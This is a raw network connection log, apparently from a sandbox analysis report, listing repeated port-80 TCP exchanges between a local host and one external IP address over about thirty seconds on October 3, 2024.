Oct 3, 2024 09:21:54.779628992 CEST	80	64397	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:54.779942989 CEST	64397	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:54.782118082 CEST	80	64397	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:54.782200098 CEST	64397	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:54.795139074 CEST	80	64397	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:54.920120001 CEST	64398	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:54.931772947 CEST	80	64398	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:54.931854963 CEST	64398	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:54.934883118 CEST	64398	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:54.945014954 CEST	80	64398	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:54.945255995 CEST	64398	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:54.950891972 CEST	80	64398	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:55.743837118 CEST	80	64398	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:55.743930101 CEST	64398	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:55.744573116 CEST	80	64398	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:55.744620085 CEST	64398	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:55.749129057 CEST	80	64398	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:55.883899927 CEST	64399	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:55.901117086 CEST	80	64399	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:55.901206017 CEST	64399	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:55.903311968 CEST	64399	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:55.920159101 CEST	80	64399	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:55.920208931 CEST	64399	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:55.927974939 CEST	80	64399	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:57.049427986 CEST	80	64399	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:57.049463987 CEST	80	64399	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:57.049612999 CEST	64399	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:57.049612999 CEST	64399	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:57.049904108 CEST	80	64399	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:57.049988031 CEST	64399	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:57.080375910 CEST	80	64399	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:57.204463005 CEST	64400	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:57.209675074 CEST	80	64400	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:57.209758997 CEST	64400	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:57.211874008 CEST	64400	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:57.220777035 CEST	80	64400	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:57.220849991 CEST	64400	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:57.230196953 CEST	80	64400	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:58.009134054 CEST	80	64400	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:58.009284019 CEST	80	64400	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:58.009483099 CEST	64400	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:58.009483099 CEST	64400	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:58.015492916 CEST	80	64400	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:58.158477068 CEST	64401	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:58.163974047 CEST	80	64401	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:58.164093018 CEST	64401	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:58.166697025 CEST	64401	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:58.171835899 CEST	80	64401	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:58.171911955 CEST	64401	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:58.179152012 CEST	80	64401	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:58.968790054 CEST	80	64401	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:58.968924046 CEST	64401	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:58.969058990 CEST	80	64401	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:58.969110966 CEST	64401	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:58.973834038 CEST	80	64401	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:59.138892889 CEST	64402	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:59.143877029 CEST	80	64402	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:59.144023895 CEST	64402	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:59.146181107 CEST	64402	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:59.151108027 CEST	80	64402	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:59.151254892 CEST	64402	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:59.156146049 CEST	80	64402	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:59.912592888 CEST	80	64402	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:59.912717104 CEST	64402	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:59.915716887 CEST	80	64402	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:59.915767908 CEST	64402	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:59.929538965 CEST	80	64402	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:00.057399988 CEST	64403	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:00.066092968 CEST	80	64403	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:00.066203117 CEST	64403	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:00.068260908 CEST	64403	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:00.075195074 CEST	80	64403	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:00.075267076 CEST	64403	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:00.080766916 CEST	80	64403	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:00.875777006 CEST	80	64403	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:00.875973940 CEST	80	64403	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:00.875994921 CEST	64403	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:00.876025915 CEST	64403	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:00.880848885 CEST	80	64403	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:01.028759956 CEST	64404	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:01.036436081 CEST	80	64404	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:01.036514997 CEST	64404	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:01.038656950 CEST	64404	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:01.051316023 CEST	80	64404	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:01.051486015 CEST	64404	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:01.067785978 CEST	80	64404	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:02.986509085 CEST	80	64404	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:02.986735106 CEST	64404	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:02.987199068 CEST	80	64404	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:02.987360001 CEST	64404	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:02.998302937 CEST	80	64404	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:03.142139912 CEST	64405	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:03.149559975 CEST	80	64405	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:03.149816036 CEST	64405	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:03.152149916 CEST	64405	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:03.157551050 CEST	80	64405	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:03.157629013 CEST	64405	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:03.162858963 CEST	80	64405	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:03.927012920 CEST	80	64405	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:03.927135944 CEST	64405	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:03.927562952 CEST	80	64405	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:03.927620888 CEST	64405	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:03.932184935 CEST	80	64405	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:04.084206104 CEST	64406	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:04.101350069 CEST	80	64406	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:04.101624012 CEST	64406	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:04.103874922 CEST	64406	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:04.115453005 CEST	80	64406	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:04.115545034 CEST	64406	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:04.122056961 CEST	80	64406	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:04.921690941 CEST	80	64406	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:04.921772957 CEST	80	64406	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:04.921953917 CEST	64406	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:04.921953917 CEST	64406	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:04.926898956 CEST	80	64406	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:05.326579094 CEST	64407	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:05.331676960 CEST	80	64407	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:05.331762075 CEST	64407	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:05.334078074 CEST	64407	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:05.338845968 CEST	80	64407	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:05.338912010 CEST	64407	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:05.343745947 CEST	80	64407	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:06.114370108 CEST	80	64407	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:06.114484072 CEST	64407	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:06.115036011 CEST	80	64407	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:06.115080118 CEST	64407	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:06.119390965 CEST	80	64407	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:06.261395931 CEST	64408	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:06.273978949 CEST	80	64408	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:06.274137020 CEST	64408	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:06.277036905 CEST	64408	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:06.283610106 CEST	80	64408	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:06.283715963 CEST	64408	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:06.290833950 CEST	80	64408	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:07.060122967 CEST	80	64408	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:07.060441017 CEST	64408	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:07.062005043 CEST	80	64408	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:07.062108994 CEST	64408	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:07.070496082 CEST	80	64408	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:07.199093103 CEST	64409	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:07.214096069 CEST	80	64409	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:07.214183092 CEST	64409	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:07.216347933 CEST	64409	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:07.225397110 CEST	80	64409	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:07.225457907 CEST	64409	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:07.234738111 CEST	80	64409	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:07.996001959 CEST	80	64409	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:07.996370077 CEST	80	64409	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:07.996431112 CEST	64409	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:07.998892069 CEST	64409	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:08.024007082 CEST	80	64409	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:08.273022890 CEST	64410	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:08.285029888 CEST	80	64410	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:08.285175085 CEST	64410	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:08.302642107 CEST	64410	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:08.313478947 CEST	80	64410	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:08.313595057 CEST	64410	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:08.323983908 CEST	80	64410	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:09.068078041 CEST	80	64410	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:09.068231106 CEST	64410	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:09.068541050 CEST	80	64410	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:09.068591118 CEST	64410	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:09.073051929 CEST	80	64410	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:09.217662096 CEST	64411	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:09.222872019 CEST	80	64411	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:09.223004103 CEST	64411	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:09.225388050 CEST	64411	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:09.230331898 CEST	80	64411	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:09.230402946 CEST	64411	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:09.235358953 CEST	80	64411	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:10.003968000 CEST	80	64411	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:10.004080057 CEST	64411	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:10.004416943 CEST	80	64411	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:10.004465103 CEST	64411	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:10.010283947 CEST	80	64411	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:10.157190084 CEST	64412	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:10.323306084 CEST	80	64412	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:10.323410988 CEST	64412	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:10.326421022 CEST	64412	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:10.331365108 CEST	80	64412	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:10.331435919 CEST	64412	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:10.336457968 CEST	80	64412	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:11.079188108 CEST	80	64412	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:11.079289913 CEST	64412	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:11.079302073 CEST	80	64412	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:11.079351902 CEST	64412	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:11.084542990 CEST	80	64412	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:11.227319002 CEST	64413	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:11.232330084 CEST	80	64413	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:11.232422113 CEST	64413	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:11.234513044 CEST	64413	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:11.239742994 CEST	80	64413	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:11.239805937 CEST	64413	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:11.249327898 CEST	80	64413	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:12.003453970 CEST	80	64413	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:12.003588915 CEST	80	64413	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:12.003792048 CEST	64413	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:12.003792048 CEST	64413	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:12.009694099 CEST	80	64413	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:12.152450085 CEST	64414	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:12.163187981 CEST	80	64414	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:12.163330078 CEST	64414	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:12.165453911 CEST	64414	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:12.172043085 CEST	80	64414	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:12.172122955 CEST	64414	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:12.178303957 CEST	80	64414	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:12.893414021 CEST	80	64414	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:12.893574953 CEST	64414	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:12.893845081 CEST	80	64414	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:12.893903971 CEST	64414	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:12.898557901 CEST	80	64414	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:13.043330908 CEST	64415	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:13.059067965 CEST	80	64415	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:13.059154034 CEST	64415	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:13.061347961 CEST	64415	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:13.068916082 CEST	80	64415	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:13.068984985 CEST	64415	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:13.073956013 CEST	80	64415	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:13.853063107 CEST	80	64415	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:13.853370905 CEST	64415	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:13.853501081 CEST	80	64415	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:13.853564024 CEST	64415	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:13.862095118 CEST	80	64415	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:13.995521069 CEST	64416	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:14.001089096 CEST	80	64416	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:14.001178026 CEST	64416	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:14.003642082 CEST	64416	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:14.008919954 CEST	80	64416	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:14.008975029 CEST	64416	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:14.014143944 CEST	80	64416	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:14.776112080 CEST	80	64416	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:14.776179075 CEST	80	64416	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:14.776328087 CEST	64416	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:14.776377916 CEST	64416	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:14.782650948 CEST	80	64416	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:14.921832085 CEST	64417	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:14.927777052 CEST	80	64417	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:14.927918911 CEST	64417	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:14.930037022 CEST	64417	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:14.935880899 CEST	80	64417	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:14.936067104 CEST	64417	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:14.942049980 CEST	80	64417	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:15.763972998 CEST	80	64417	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:15.764133930 CEST	64417	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:15.766371965 CEST	80	64417	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:15.766482115 CEST	64417	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:15.769372940 CEST	80	64417	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:15.905189991 CEST	64418	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:15.918740988 CEST	80	64418	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:15.918838978 CEST	64418	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:15.921727896 CEST	64418	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:15.929102898 CEST	80	64418	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:15.929178953 CEST	64418	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:15.934868097 CEST	80	64418	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:16.667747974 CEST	80	64418	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:16.667875051 CEST	64418	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:16.668628931 CEST	80	64418	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:16.668695927 CEST	64418	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:16.672756910 CEST	80	64418	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:16.815005064 CEST	64419	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:16.820117950 CEST	80	64419	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:16.820242882 CEST	64419	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:16.822302103 CEST	64419	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:16.827244043 CEST	80	64419	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:16.827330112 CEST	64419	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:16.832212925 CEST	80	64419	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:17.525538921 CEST	80	64419	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:17.525800943 CEST	80	64419	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:17.525911093 CEST	64419	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:17.536253929 CEST	64419	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:17.541316986 CEST	80	64419	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:17.691169024 CEST	64420	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:17.696270943 CEST	80	64420	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:17.696378946 CEST	64420	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:17.698632956 CEST	64420	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:17.703607082 CEST	80	64420	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:17.703674078 CEST	64420	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:17.708511114 CEST	80	64420	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:18.554850101 CEST	80	64420	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:18.554965019 CEST	80	64420	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:18.555021048 CEST	64420	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:18.555186987 CEST	64420	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:18.559915066 CEST	80	64420	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:18.701395988 CEST	64421	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:18.706377029 CEST	80	64421	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:18.706465960 CEST	64421	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:18.709377050 CEST	64421	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:18.714226007 CEST	80	64421	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:18.714301109 CEST	64421	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:18.719157934 CEST	80	64421	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:19.379185915 CEST	80	64421	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:19.379229069 CEST	80	64421	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:19.379297018 CEST	64421	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:19.379714012 CEST	64421	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:19.384819031 CEST	80	64421	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:19.534192085 CEST	64422	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:19.539474010 CEST	80	64422	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:19.539597034 CEST	64422	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:19.542762041 CEST	64422	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:19.547653913 CEST	80	64422	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:19.547744036 CEST	64422	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:19.552742958 CEST	80	64422	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:20.358504057 CEST	80	64422	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:20.358526945 CEST	80	64422	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:20.358625889 CEST	64422	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:20.368416071 CEST	64422	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:20.373251915 CEST	80	64422	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:20.553884029 CEST	64423	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:20.559114933 CEST	80	64423	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:20.559228897 CEST	64423	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:20.561255932 CEST	64423	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:20.566163063 CEST	80	64423	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:20.566221952 CEST	64423	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:20.571067095 CEST	80	64423	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:21.203330994 CEST	80	64423	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:21.203378916 CEST	80	64423	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:21.203422070 CEST	64423	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:21.203464031 CEST	64423	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:21.208334923 CEST	80	64423	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:21.343334913 CEST	64424	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:21.348514080 CEST	80	64424	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:21.348617077 CEST	64424	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:21.351571083 CEST	64424	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:21.356620073 CEST	80	64424	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:21.356698990 CEST	64424	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:21.361653090 CEST	80	64424	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:22.048629045 CEST	80	64424	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:22.048710108 CEST	80	64424	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:22.048861980 CEST	64424	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:22.049027920 CEST	64424	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:22.053824902 CEST	80	64424	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:22.207492113 CEST	64425	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:22.212685108 CEST	80	64425	45.149.241.169	192.168.2.11
